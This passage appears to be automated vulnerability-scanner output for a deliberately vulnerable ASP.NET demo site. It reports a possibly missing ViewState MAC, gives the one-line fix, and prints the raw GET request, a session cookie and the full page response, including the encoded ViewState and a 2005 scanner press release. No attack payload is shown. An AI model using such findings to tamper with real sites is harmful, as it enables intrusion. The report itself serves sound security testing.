18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 30454Response body (30454 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the 